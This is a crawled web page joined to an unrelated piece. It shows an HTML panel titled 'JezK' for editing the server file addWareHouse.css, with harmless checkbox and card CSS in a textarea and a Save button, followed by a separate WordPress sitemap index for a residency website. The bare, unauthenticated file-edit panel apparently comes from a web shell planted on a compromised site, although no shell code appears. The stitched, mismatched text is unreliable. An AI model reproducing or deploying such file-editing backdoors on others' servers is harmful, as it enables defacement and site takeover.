
<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<title>JezK</title>
<style>
    body {
        font-family: Arial, sans-serif;
        margin: 0;
        padding: 0;
    }
    #container {
        max-width: 800px;
        margin: 20px auto;
        padding: 20px;
        border: 1px solid #ccc;
        border-radius: 5px;
        background-color: #f9f9f9;
    }
    h1 {
        text-align: center;
        color: #333;
    }
    h2 {
        margin-top: 30px;
        color: #555;
    }
    ul {
        list-style-type: none;
        padding: 0;
    }
    li {
        margin-bottom: 10px;
    }
    a {
        text-decoration: none;
        color: #007bff;
    }
    a:hover {
        text-decoration: underline;
    }
    form {
        margin-top: 20px;
    }
    input[type="text"], input[type="file"], input[type="submit"] {
        margin-bottom: 10px;
    }
    hr {
        border: 0;
        height: 1px;
        background-color: #ccc;
        margin-top: 20px;
        margin-bottom: 20px;
    }
</style>
</head>
<body>
<div id="container">
    <h1>JezK</h1>
    <h2>Edit File: addWareHouse.css</h2><form method="post"><textarea name="file_content" rows="10" cols="50">
 .btn-secondary:not(:disabled):not(.disabled).active, .btn-secondary:not(:disabled):not(.disabled):active, .show&gt;.btn-secondary.dropdown-toggle {
    color: #fff;
    background-color: blue;
    border-color: #4e555b;
}

.btn-group1
{
  /*background-color: blue;*/
  color: white;
  border-color: blue;
  text-align: center;
}
.btn-group
{
  position: relative;
  display: block;
  text-align: center;
  
}


.form-control
{
  background-color: #F3F6FE;
}

/* Customized checkbox */

/* Hide the browser's default checkbox */
 input[type=&quot;checkbox&quot;] {
  position: absolute;
  opacity: 0;
  cursor: pointer;
  height: 0;
  width: 0;
}

.checkbox
{
  position: absolute;
  top: 2px;
  left: 15px;
  height: 20px;
  width: 20px;
  background-color: #eee;
  border-radius:12px;
}
:hover input ~ .checkbox {
  background-color: #ccc;
}

/* When the checkbox is checked, add a blue background */
 input[type=&quot;checkbox&quot;]:checked ~ .checkbox {
  background-color: #2196F3;
}

/* Create the checkmark/indicator (hidden when not checked) */
.checkbox:after {
  content: &quot;&quot;;
  position: absolute;
  display: none;
}

/* Show the checkmark when checked */
input[type=&quot;checkbox&quot;]:checked ~ .checkbox:after {
    display: block;
}

/* Style the checkmark/indicator */
.checkbox:after {
  left: 9px;
  top: 5px;
  width: 5px;
  height: 10px;
  border: solid white;
  border-width: 0 3px 3px 0;
  -webkit-transform: rotate(45deg);
  -ms-transform: rotate(45deg);
  transform: rotate(45deg);
}



input[type=&quot;radio&quot;] {
  position: absolute;
  opacity: 0;
  cursor: pointer;
 }
 span.checkmark {
     border-radius: 50%;
    height: 24px;
    width: 24px;
    position: relative;
    background-color: grey;
    color: #fff;
    display: inline-block;
    text-align: center;
    margin-right: 9px;
 }
 
 input:checked ~ .checkmark{
  background-color: #2196F3;
 }
 
 input:checked ~ .radio-inline{
  background-color: #2196F3;
 }
 
 label{
  display: flex;
    align-items: center;
 }
 
 
 li{
 list-style:none;
 display:inline-block;
 
 }
 .line{
 border-bottom:2px solid black;
 line-height:22px;
 width:70%;
 padding:0px;
 height:25px;
 display: flex;
    align-items: center;
 
 }
 @media (max-width:768px){
    .line{
      display: none;
    }
 
 }

 .card {
  border: 0px solid #fff;
  border-radius: 22px;
  background: #ffffff;
  box-shadow: 0 0 10px #deeffe;
  padding: 2%;
 }

 .card-body h5 {
  color: #434343 !important;
  font-size: 19px;
 }

 .radio-inline {
  color:#969696;
  font-weight: 500;
  font-size: 18px;
 }

 .error
{
    color:red;
}

 </textarea><br><input type="submit" value="Save"></form></div>
</body>
</html>

<?xml version="1.0" encoding="UTF-8"?>
<?xml-stylesheet type="text/xsl" href="https://satyadevaresidency.com/wp-sitemap-index.xsl" ?>
<sitemapindex xmlns="http://www.sitemaps.org/schemas/sitemap/0.9"><sitemap><loc>https://satyadevaresidency.com/wp-sitemap-posts-post-1.xml</loc></sitemap><sitemap><loc>https://satyadevaresidency.com/wp-sitemap-posts-page-1.xml</loc></sitemap><sitemap><loc>https://satyadevaresidency.com/wp-sitemap-posts-gallery-1.xml</loc></sitemap><sitemap><loc>https://satyadevaresidency.com/wp-sitemap-posts-testimonial-1.xml</loc></sitemap><sitemap><loc>https://satyadevaresidency.com/wp-sitemap-taxonomies-category-1.xml</loc></sitemap><sitemap><loc>https://satyadevaresidency.com/wp-sitemap-taxonomies-post_tag-1.xml</loc></sitemap><sitemap><loc>https://satyadevaresidency.com/wp-sitemap-taxonomies-gallery_cat-1.xml</loc></sitemap></sitemapindex>
